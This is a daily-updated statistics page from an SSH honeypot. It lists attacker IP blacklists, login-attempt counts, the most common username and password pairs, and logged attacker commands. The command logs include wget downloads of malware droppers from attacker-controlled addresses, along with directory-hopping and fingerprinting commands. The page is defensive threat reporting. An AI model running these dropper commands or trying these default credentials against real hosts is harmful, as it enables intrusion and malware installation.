Honeypot SSH

This page is updated daily. Last update: 2019-06-24 22:02:11 UTC

The following SSH blacklists (updated every day, in text format) contain the IP addresses of hosts that tried to brute-force their way into my honeypot located in Italy.

Monthly SSH login attempts

Attackers blacklists (IP address)

24 hours (txt); week (txt); year (txt)

Statistics - 2019

Unique IP address: 5464
Unique username: 7124
Unique password: 22410

Other information

Latest files downloaded
All passwords ordered by length (txt)
All client versions (txt)

Latest commands executed

Timestamp; Command; Success; IP address; AS; AS Org; Country
2019-06-24 18:42:38; cd /tmp | | cd /var/run | | cd /mnt | | cd /root | | cd /; ok; 46.101.98.242; 14061; DIGITALOCEAN-ASN DigitalOcean, LLC, US; DE
2019-06-24 18:42:38; wget http://107.173.145.175/njs.sh; ok; 46.101.98.242; 14061; DIGITALOCEAN-ASN DigitalOcean, LLC, US; DE
2019-06-24 16:23:50; cd /tmp | | cd /var/run | | cd /mnt | | cd /root | | cd /; ok; 139.59.143.199; 14061; DIGITALOCEAN-ASN DigitalOcean, LLC, US; DE
2019-06-24 16:23:50; wget http://107.173.145.175/njs.sh; ok; 139.59.143.199; 14061; DIGITALOCEAN-ASN DigitalOcean, LLC, US; DE
2019-06-24 16:22:47; cd /tmp | | cd /var/run | | cd /mnt | | cd /root | | cd /; ok; 139.59.143.199; 14061; DIGITALOCEAN-ASN DigitalOcean, LLC, US; DE
2019-06-24 16:22:47; wget http://107.173.145.175/njs.sh; ok; 139.59.143.199; 14061; DIGITALOCEAN-ASN DigitalOcean, LLC, US; DE
2019-06-24 13:50:52; cd /tmp | | cd /var/run | | cd /mnt | | cd /root | | cd /; ok; 46.101.98.242; 14061; DIGITALOCEAN-ASN DigitalOcean, LLC, US; DE
2019-06-24 13:50:52; wget http://107.173.145.175/njs.sh; ok; 46.101.98.242; 14061; DIGITALOCEAN-ASN DigitalOcean, LLC, US; DE
2019-06-24 13:11:30; cd /tmp cd /run cd /; ok; 80.211.3.109; 31034; ARUBA-ASN, IT; DK
2019-06-24 13:11:30; wget http://185.172.110.239/cyobins.sh; ok; 80.211.3.109; 31034; ARUBA-ASN, IT; DK

Latest URL

Timestamp URL Shasum - VirusTotal analysis

Latest VirusTotal analysis

Datetime Filename (shasum) - VirusTotal analysis Virustotal scan date Virustotal results

Top most sessions per distinct IP address - 2019

IP Address; AS; AS Org; Country
5.188.86.211 (virustotal); 49453; GLOBALLAYER, NL; RU
88.214.26.90 (virustotal); 201912; FCLOUD-AS, DE; UNK
5.188.87.55 (virustotal); 57172; GLOBALLAYER, NL; RU
5.188.87.52 (virustotal); 57172; GLOBALLAYER, NL; RU
5.188.87.49 (virustotal); 57172; GLOBALLAYER, NL; RU
5.188.87.54 (virustotal); 57172; GLOBALLAYER, NL; RU
5.188.87.51 (virustotal); 57172; GLOBALLAYER, NL; RU
5.188.87.53 (virustotal); 57172; GLOBALLAYER, NL; RU
134.19.187.75 (virustotal); 49453; GLOBALLAYER, NL; NL
5.188.86.210 (virustotal); 49453; GLOBALLAYER, NL; RU

Login attempts last 10 days

Date; Occurrences
2019-06-25; 1
2019-06-24; 5459
2019-06-23; 4808
2019-06-22; 3427
2019-06-21; 9052
2019-06-20; 14408
2019-06-19; 15082
2019-06-18; 15810
2019-06-17; 15265
2019-06-16; 7557

Top username - 2019

Username
root
admin
user
ubnt
guest
ftp
default
test
support
nagios

Top password - 2019

Password
root
123456
admin
1234
password
12345
ubnt
test
123
user

Top username/password - 2019

Username / Password
root / root
admin / admin
ubnt / ubnt
user / user
support / support
admin / password
admin / 1234
root / password
root / admin
admin / 12345

Top commands - 2019

Command
cd /tmp | | cd /var/run | | cd /mnt | | cd /root | | cd /
wget http://107.173.145.175/njs.sh
/gisdfoewrsfdf
wget http://102.165.49.69/bins.sh
wget http://102.165.50.10/bins.sh
echo -e '\x47\x72\x6f\x70/' > //.nippon
cat //.nippon
rm -f //.nippon
cd /tmp cd /run cd /
uname -a

Top tunnelling port - 2019

Port #

Top tunnelling IP address - 2019

IP address; DNS; AS; AS Org; Country; #
ya.ru (virustotal); n/a; -; -; UNK; 652683
163.172.20.152 (virustotal); 163-172-20-152.rev.poneytelecom.eu; 12876; AS12876, FR; GB; 19974
www.google.com (virustotal); 163-172-20-152.rev.poneytelecom.eu; -; -; UNK; 14947
69.31.136.5 (virustotal); n/a; 3257; GTT-BACKBONE GTT, DE; US; 14909
104.47.12.33 (virustotal); n/a; 8075; MICROSOFT-CORP-MSN-AS-BLO...; US; 9304
104.47.6.33 (virustotal); n/a; 8075; MICROSOFT-CORP-MSN-AS-BLO...; US; 9299
104.47.9.33 (virustotal); n/a; 8075; MICROSOFT-CORP-MSN-AS-BLO...; US; 9247
104.47.4.33 (virustotal); n/a; 8075; MICROSOFT-CORP-MSN-AS-BLO...; US; 9147
104.47.10.33 (virustotal); n/a; 8075; MICROSOFT-CORP-MSN-AS-BLO...; US; 9024
104.47.0.33 (virustotal); n/a; 8075; MICROSOFT-CORP-MSN-AS-BLO...; US; 8918